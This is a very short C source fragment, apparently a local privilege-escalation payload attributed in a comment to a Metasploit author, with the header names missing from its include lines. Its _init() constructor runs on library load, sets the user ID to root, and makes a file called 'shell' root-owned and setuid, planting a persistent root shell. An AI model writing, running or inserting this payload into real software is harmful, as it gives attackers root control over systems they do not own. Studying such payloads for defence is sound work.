/* hdm[at]metasploit.com */ #include #include void _init() { setreuid(0,0); system("chown root shell; chmod 4755 shell"); exit(0); }